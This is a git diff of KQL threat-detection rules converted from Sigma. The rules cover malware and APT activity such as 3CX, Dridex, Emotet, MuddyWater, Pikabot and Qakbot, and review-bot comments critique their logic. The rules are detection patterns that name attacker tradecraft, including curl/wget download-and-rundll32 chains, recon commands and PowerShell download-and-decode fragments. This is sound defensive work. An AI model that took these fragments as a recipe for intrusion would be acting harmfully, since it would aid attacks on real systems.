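Review bot: The version branch fires on every 3CXDesktopApp process whose ProcessVersionInfoProductVersion merely contains `18.12.`, which also covers non-trojanized 18.12.x builds, so this high-severity rule will keep alerting on installs that were patched past the compromise; if the intent is the known trojanized builds, pin the exact versions instead (public reporting names 18.12.407 and 18.12.416 — confirm against the upstream Sigma rule before changing). The hash branches compare complete digests with `startswith`; an exact, case-insensitive list such as `SHA256 in~ (dynamic(["DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC", ...]))` reads as an IOC list, avoids prefix semantics and is easier to extend. The `| where` clause begins on the previous line.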
@@ -1,10 +1,10 @@
-// Title: Potential Compromised 3CXDesktopApp Update Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-29
-// Level: high
-// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Compromised 3CXDesktopApp Update Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql
index 68d1c51c..3b1c17b9 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql
@@ -1,12 +1,12 @@
-// Title: Potential Devil Bait Malware Reconnaissance
-// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects specific process behavior observed with Devil Bait samples
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Devil Bait Malware Reconnaissance
+// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific process behavior observed with Devil Bait samples
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql
index 330a18cb..51270f60 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql
@@ -1,12 +1,12 @@
-// Title: Potential Devil Bait Related Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Potential Devil Bait Related Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql
index 72bbf53f..58010ff5 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql
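Review bot: The header says the rule detects the *creation* of .txt/.xml files, but the DeviceFileEvents query has no ActionType filter, so modifications, renames and deletions of the same files by the same parents also match and one dropped file can raise several alerts; adding `| where ActionType == "FileCreated"` (or `ActionType in ("FileCreated", "FileRenamed")` if renames into the folder should count) aligns the query with the description. The `contains "\\AppData\\Roaming\\Microsoft\\"` check is a substring match, so any .txt/.xml written under deeper subfolders such as Roaming\Microsoft\Windows by a wscript- or mshta-launched installer also hits; if that is intended, say so under False Positives instead of "Unlikely".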
@@ -1,12 +1,12 @@
-// Title: Potential Dridex Activity
-// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-01-10
-// Level: critical
-// Description: Detects potential Dridex acitvity via specific process patterns
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Dridex Activity
+// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-10
+// Level: critical
+// Description: Detects potential Dridex acitvity via specific process patterns
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql
index 6d8e6e06..29d8263c 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql
@@ -1,10 +1,10 @@
-// Title: Potential Emotet Rundll32 Execution
-// Author: FPT.EagleEye
-// Date: 2020-12-25
-// Level: critical
-// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Emotet Rundll32 Execution
+// Author: FPT.EagleEye
+// Date: 2020-12-25
+// Level: critical
+// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql
index d166b902..b76c6179 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential EmpireMonkey Activity
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-04-02
-// Level: high
-// Description: Detects potential EmpireMonkey APT activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential EmpireMonkey Activity
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-04-02
+// Level: high
+// Description: Detects potential EmpireMonkey APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
index 2ae3cece..52be6fd3 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql
@@ -1,10 +1,10 @@
-// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: high
-// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
index 83db92ba..5115222b 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql
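Review bot: The allow-list in the `not(...)` clause hard-codes the `C:` drive (`FolderPath startswith "C:\\Program Files\\Google\\"` and the x86 variant), so on hosts where Windows or Program Files lives on another drive every legitimate GoogleUpdate self-spawn will alert at level high. The sibling Qakbot rules in this same patch already use drive-agnostic prefixes such as `":\\ProgramData\\"`; the same form works here: `FolderPath contains ":\\Program Files\\Google\\" or FolderPath contains ":\\Program Files (x86)\\Google\\"`. If the hard-coded drive is deliberate, a short header comment stating the assumption would save the next analyst a false-positive investigation.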
@@ -1,11 +1,11 @@
-// Title: Potential Kapeka Decrypted Backdoor Indicator
-// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-03
-// Level: high
-// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
-// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential Kapeka Decrypted Backdoor Indicator
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
+// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
 | where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql
index 46aad136..9b82de63 100644
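Review bot: The `matches regex "\\\\[a-zA-Z]{5,6}\\.wll"` test is the one case-sensitive and unanchored check in an otherwise case-insensitive rule: KQL `matches regex` (RE2) honours case, so a drop named `ABCDE.WLL` or `abcde.Wll` is missed while the neighbouring `contains`/`endswith` terms would still accept it, and without a trailing `$` the pattern also accepts the string as a directory component rather than the file name. A verbatim, case-insensitive, anchored form such as `FolderPath matches regex @"(?i)\\[a-z]{5,6}\.wll$"` closes both gaps without widening the match. The `win32log.exe`/`crdss.exe` branch is not tied to the ProgramData/AppData prefixes or to an ActionType, so it alerts on every file event for those names anywhere on disk — worth confirming that is intended at level high.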
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential Ke3chang/TidePool Malware Activity
-// Author: Markus Neis, Swisscom
-// Date: 2020-06-18
-// Level: high
-// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
-// MITRE Tactic: Defense Evasion
-// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Ke3chang/TidePool Malware Activity
+// Author: Markus Neis, Swisscom
+// Date: 2020-06-18
+// Level: high
+// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql
index 908034f0..defe9e0d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential MuddyWater APT Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-10
-// Level: high
-// Description: Detects potential Muddywater APT activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential MuddyWater APT Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: high
+// Description: Detects potential Muddywater APT activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
index b9c6973f..9029f324 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
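Review bot: The second branch requires the literal `[System.Text.Encoding]::UTF8.GetString]`, which ends in `]` where a real PowerShell invocation reads `[System.Text.Encoding]::UTF8.GetString(`; unless that closing bracket reproduces an artefact seen in an actual sample (check the upstream Sigma rule and a known command line), every other term in the branch can be present and the branch still never matches, so the XOR-decode download pattern it is meant to catch is silently dead. Changing the term to `ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString("` restores it. A one-line header comment noting that the branches are independent OR conditions of three distinct MuddyWater tradecraft patterns would also help triage, since the rule title alone does not say which one fired.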
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql 
@@ -1,12 +1,12 @@
-// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
-// Author: Alejandro Houspanossian ('@lekz86')
-// Date: 2024-01-02
-// Level: medium
-// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
-// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
-// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+// Author: Alejandro Houspanossian ('@lekz86')
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
index 3bbf2b20..e0f01066 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Qakbot Rundll32 Execution
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-05-24
-// Level: high
-// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Qakbot Rundll32 Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: high
+// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
index d34b78ea..19eb8fcc 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql
@@ -1,11 +1,11 @@
-// Title: Potential Raspberry Robin CPL Execution Activity
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-03-07
-// Level: high
-// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
-// This behavior was observed in multiple Raspberry-Robin variants.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Raspberry Robin CPL Execution Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-03-07
+// Level: high
+// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
+// This behavior was observed in multiple Raspberry-Robin variants.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
index e1c48f91..26162c2d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql
@@ -1,12 +1,12 @@
-// Title: Ps.exe Renamed SysInternals Tool
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-10-22
-// Level: high
-// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats
-// False Positives:
-// - Renamed SysInternals tool
-
-DeviceProcessEvents
+// Title: Ps.exe Renamed SysInternals Tool
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-10-22
+// Level: high
+// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats
+// False Positives:
+// - Renamed SysInternals tool
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
index 82745567..7161c835 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql
@@ -1,12 +1,12 @@
-// Title: Qakbot Regsvr32 Calc Pattern
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-26
-// Level: high
-// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Qakbot Regsvr32 Calc Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
index 96c97fea..ab910e2b 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql
@@ -1,12 +1,12 @@
-// Title: Qakbot Rundll32 Exports Execution
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-05-24
-// Level: critical
-// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Qakbot Rundll32 Exports Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
